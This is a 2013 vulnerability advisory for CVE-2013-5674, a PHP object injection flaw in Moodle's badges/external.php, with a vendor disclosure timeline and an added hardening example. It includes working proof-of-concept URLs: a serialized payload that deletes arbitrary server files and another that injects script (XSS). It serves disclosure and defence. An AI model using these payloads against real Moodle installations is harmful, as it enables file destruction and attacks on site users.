Moodle 2.5.0-1 badges/external.php PHP Object Injection

2013-09-16 12:58:30 » advisory, CVE-2013-5674, moodle, object injection, pentesting, php, security, vulnerability, xss

Moodle CMS versions 2.5.0 and 2.5.1 are prone to an Object Injection vulnerability because not properly sanitized user-supplied input is passed to the PHP unserialize() function.

An attacker could inject an ad-hoc serialized object into the application scope, maliciously reusing internal PHP code snippets (gadgets). In this application the attacker could delete files and perform XSS attacks.

Vulnerability

The affected file badges/external.php unserializes user input at line 35:

    $json = required_param('badge', PARAM_RAW);       // raw, unvalidated user input
    $badge = new external_badge(unserialize($json));  // object injection sink

POC

To exploit this kind of vulnerability it is necessary to find reusable functions that are called during the lifetime of the object instance. As explained in the magic methods section of the PHP manual, two functions are always called:

  • __wakeup(): Called immediately after unserialize() reconstructs the sleeping object.
  • __destruct(): As in other object-oriented languages, PHP calls the destructor of the object at the end of the instance's life.

Moreover, on this particular object instance the __get(string $name) magic method is called twice more, in the form $instance->$name:

  • __get("assertion"): Called in badges/renderer.php:377 $issued->assertion
  • __get("imageUrl"): Called in badges/renderer.php:389 array('src' => $issued->imageUrl)
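As an added example that is not part of the original advisory or of Moodle's own code, the following PHP contrasts the unserialize() sink shown above with two hardened forms; side_effect_gadget, its $path property and the helper function names are constructed stand-ins for a gadget like csv_export_writer.

```php
<?php
// Constructed stand-in for a gadget whose __destruct() performs a side effect
// (the real csv_export_writer calls unlink($this->path); here we only echo).
class side_effect_gadget {
    public $path = '';
    public function __destruct() {
        echo "destructor ran for path={$this->path}\n";
    }
}

// Constructed attacker-style input: a serialized side_effect_gadget.
$input = 'O:18:"side_effect_gadget":1:{s:4:"path";s:8:"/tmp/foo";}';

// 1) Vulnerable: the original pattern. Any loadable class is instantiated and
//    its magic methods run (here the destructor, once the object goes away).
function vulnerable(string $json) {
    return unserialize($json);
}

// 2) Hardened (PHP 7+): refuse to instantiate any class. Objects in the payload
//    become __PHP_Incomplete_Class placeholders, so no __wakeup()/__destruct()
//    code of the requested class ever runs; reject such payloads outright.
function hardened_unserialize(string $json) {
    $obj = unserialize($json, ['allowed_classes' => false]);
    if ($obj instanceof __PHP_Incomplete_Class) {
        throw new InvalidArgumentException('badge parameter must not contain objects');
    }
    return $obj;
}

// 3) Preferred: the badge parameter is data, not code, so parse a format that can
//    never instantiate application classes. json_decode() yields only stdClass
//    and scalars; the shape check enforces the two properties the renderer reads.
function hardened_json(string $json) {
    $obj = json_decode($json, false, 512, JSON_THROW_ON_ERROR);
    if (!is_object($obj) || !isset($obj->assertion, $obj->imageUrl)) {
        throw new InvalidArgumentException('badge parameter has unexpected shape');
    }
    return $obj;
}

$v = vulnerable($input);   // object created from attacker input
unset($v);                 // destructor of the injected object fires here

try { hardened_unserialize($input); } catch (InvalidArgumentException $e) { echo $e->getMessage(), "\n"; }
try { hardened_json($input); } catch (JsonException $e) { echo 'rejected, not JSON: ', $e->getMessage(), "\n"; }
```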

FILE DELETE

The method csv_export_writer::__destruct() in lib/csvlib.class.php:538 contains:

    public function __destruct() {
        fclose($this->fp);      // $fp is attacker-controlled after unserialize()
        unlink($this->path);    // $path is attacker-controlled as well
    }

It can therefore be exploited to delete a file on the server by passing a serialized csv_export_writer object. Here is the PoC to delete /path/of/the/file/to/delete:

    http://localhost/badges/external.php?badge=O:17:"csv_export_writer":1:{s:4:"path";s:27:"/path/of/the/file/to/delete";}

XSS

The vulnerable script badges/external.php returns an HTML page built from the injected unserialized $badge object at line 43:

    echo $output->render($badge);

The rendered HTML page, constructed in core_badges_renderer::render_external_badge(), reflects the two object properties assertion and imageUrl, so they can be used as an XSS vector. Here is the PoC for the XSS:

    http://localhost/badges/external.php?badge=O:8:"stdClass":2:{s:8:"imageUrl";s:0:"";s:9:"assertion";O:8:"stdClass":1:{s:5:"badge";O:8:"stdClass":1:{s:6:"issuer";O:8:"stdClass":1:{s:4:"name";s:30:"<script>alert(1);</script><!--";}}}}

CVE REFERENCE

The Common Vulnerabilities and Exposures project (cve.mitre.org) has assigned the name CVE-2013-5674 to this vulnerability.

DISCLOSURE

29/Jul/2013: Vendor alerted via ticket MDL-40924
02/Sep/2013: Fix released in commit 2d3c0faef by Yuliya Bozhko
07/Sep/2013: Moodle release 2.5.2
16/Sep/2013: Public disclosure
